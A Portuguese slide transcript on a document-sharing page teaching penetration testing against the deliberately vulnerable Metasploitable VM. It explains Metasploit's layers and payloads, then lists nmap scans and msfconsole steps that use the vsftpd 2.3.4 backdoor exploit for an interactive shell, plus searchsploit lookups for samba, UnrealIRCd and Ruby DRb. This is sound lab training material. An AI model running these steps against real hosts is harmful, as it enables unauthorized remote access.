invasaocom exploits

Report

Post on 19-Mar-2017

92 Views

Category:

Technology

0 Downloads

Preview:

Click to see full reader

TRANSCRIPT

Testes de SegurançaNauber Gois

Metasploitable - Linux com vulnerabilidades

nmap -Pn [target IP address]

O REX(Ruby Extension Library) é o núcleo do Metasploit, ele disponibiliza a API com funcionalidades que ajudam no desenvolvimento de um exploit, além de bibliotecas,

sockets e protocolos.

O CORE do framework é constituído de sub-sistemas que controlam sessões, módulos, eventos é a API base.

O BASE fornece uma API amigável e simplifica a comunicação com outros módulos, interfaces e plugins.

Na camada MODULES é onde reside os exploits e payloads, basicamente os exploits são programas escritos para explorar alguma falha e o payload é como um

complemento para o exploit. Basicamente o payload é o código que vai ser injetado no alvo, ao ser injetado alguma ação pré-definida será executada, por exemplo: (realizar um download, executar um arquivo, apagar alguma informação ou estabelecer uma

conexão com outro sistema).

A camada de INTERFACES conta com o modo console onde temos um shell poderoso que trabalha em conjunto com o SO, o cli que fornece uma interface onde é possível

automatizar testes de invasão e ainda temos interfaces web e gui.

Comandos do metasploit

Um exploit (em português explorar, significando "usar algo para sua própria vantagem") é um pedaço de software, um pedaço de dados ou uma sequência de comandos a fim de causar um comportamento acidental ou imprevisto a ocorrer no software ou hardware de um computador ou em algum eletrônico (normalmente computadorizado).

No caso de um exploit, o payload é a parte do código injetada na vítima que vai executar alguma ação: criar um usuário, iniciar um processo, apagar arquivos, etc. Ou seja lá o que for que o atacante quer que seja executado quando a vulnerabilidade for explorada com sucesso pelo seu exploit.

nmap -sV [IP] -p 21search vsftpd

msfconsole

When msfconsole is running select the backdoor exploit using the following command:

use exploit/unix/ftp/vsftpd_234_backdoor

Type the following command to have a look at the exploit options:

Show options

set rhost 192.168.25.168

show payloads

set payload cmd/unix/interact

run

Procurando por vulnerabilidades

nmap -sV [IP] -p 6667search unreal ircd

nmap -sV [IP] -p 80search apache

nmap -sV [IP] -p 139search samba

nmap -sV [IP] -p8787

searchsploit -e Ruby DRb RMI

searchsploit -e Ruby

cat /usr/share/exploitdb/platforms/linux/remote/17058.rb

search name:Distributed Ruby Send instance_eval/syscall Code Execution

Armitage

top related

exploits magazine march 2013
Documents
anoiting for exploits
Documents
customizing public exploits
Documents
les exploits galants - excerpts.numilog.com
Documents
exploits in management*
Documents
exploits magazine april 2014
Documents
how hamas exploits children
News & Politics
client side exploits
Technology
anointed to do exploits
Spiritual
software exploits
Documents
exploits magazine august 2013
Documents
les exploits
Documents
exploits of the satyr
Documents
advanced buffer overflow exploits
Documents
discover local suid exploits
Documents
exploits magazine february 2014
Documents
healing exploits in evangelism
Travel
linux protections against exploits
Technology
lec04: writing exploits
Documents
nethemba - writing exploits
Technology